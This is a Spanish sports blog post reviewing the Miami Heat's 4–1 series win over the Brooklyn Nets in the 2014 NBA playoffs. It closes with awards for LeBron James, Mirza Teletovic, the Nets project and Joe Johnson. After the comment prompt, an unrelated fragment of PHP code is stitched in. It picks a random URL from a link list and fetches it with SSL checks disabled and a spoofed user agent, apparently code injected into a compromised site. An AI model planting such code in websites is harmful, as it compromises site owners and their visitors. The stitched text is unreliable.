PO 2014: Resumen Heat 4 – Nets 1

16 de May de 2014 por TheDeerHunter

Un paso más hacia el threepeat. Cuarta final de conferencia consecutiva y sexta de las 8 últimas temporadas para “El Elegido”. Camino firme e incluso plácido para los vigentes campeones. De nada sirvieron a los Nets las cuatro ilusionantes victorias de la regular que confundieron a algunos analistas. A la hora de la verdad no han sido rivales para LeBron James y los suyos aunque al menos han logrado plantarles cara hasta cierto punto y estrenar su casillero de derrotas, aunque sólo fuera gracias a una anomalía en forma de acierto histórico en el lanzamiento exterior. Puro espejismo.

De no haberse producido la explosión triplista del tercer partido probablemente estaríamos hablando en términos similares al resumen de la serie Heat vs Bobcats de primera ronda y de otra barrida más. Los Heat han jugado excesivamente cómodos y lejos del ritmo ultra-competitivo que se les presupone. Aseguraron los dos primeros choques sin que sus rivales alcanzaran los 90 puntos. Confiados y con el viento a favor ni siquiera se han encontrado con una defensa digna como para inquietarse, inferior incluso a la de Charlotte. A medio gas se han movido en torno a un 50% de acierto que en momentos puntuales de cierto riesgo han mejorado todavía más. LeBron y Wade básicamente han hecho lo que les ha dado la gana. En ese contexto el teórico ritmo lento que pudieran imponer los Nets era irrelevante e incluso contraproducente para sus propios intereses. Su única baza, habíamos dicho. 

Uno de los proyectos más ambiciosos y megalómanos que haya conocido esta liga se queda en este punto del camino. Queda el consuelo de caer contra los grandes favoritos pero dudamos que una segunda ronda estuviera en la cabeza de los gerifaltes cuando se ponían a firmar cheques como si no hubiera un mañana. Plantillón de 193 millones, incluido impuesto de lujo, que no ha llegado prácticamente a jugar a nada. El único logro ha sido el de doblegar a un rival menor como Toronto, padeciendo lo infinito a 7 partidos. Les queda un panorama complicado respecto al futuro inmediato, con aquel objetivo que se propusieron de ganar un anillo en 2015 albirando en el horizonte. No tiene pinta de cumplirse, la verdad.

PREMIOS

MVP: Imperial LeBron James, una vez más. Firmando 30 puntos por partido con porcentajes cercanos al 60%, incluido el cuarto partido en el que rozó los 50 puntos. Suma además más de 6 rebotes, casi 4 asistencias y más de un robo por partido en estado de relax, el animal. Y eso que se suele destacar la notable defensa que le ha hecho Pierce.

Sorpresa: Tras un primer año infame en el que nadie en Brooklyn mostró la mínima confianza en él, Mirza Teletovic se ha consagrado como un hombre importante. En esta serie ha estado muy por delante de nombres como Garnett, Blatche, Kirilenko o el rookie Plumlee, extrañamente condenado al ostracismo en postemporada.

Decepción: Como decía la última crónica que protagonizan este curso, la decepción en términos globales es el proyecto “ganador” de los Brooklyn Nets. Podemos personalizarlo en la falta de carácter de Deron Williams, que por unas razones o por otras siempre termina naufragando ante las mayores exigencias, en Kevin Garnett, que seguramente se ganaría mejor el sueldo comentando los partidos en televisión, o en el desvarío técnico de Jason Kidd con gente como Blatche o Plumlee otorgándoles un protagonismo intermitente e incoherente.

Esfuerzo en vano: Joe Johnson, el mejor de Brooklyn en estos playoffs en general y en esta serie en particular. Más de 20 puntos por partido con excelentes porcentajes y sin absorber excesivamente el juego. Ha añadido más de 4 rebotes y 3 asistencias. Notable temporada la suya, es de los pocos a los que no se les puede reprochar nada.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>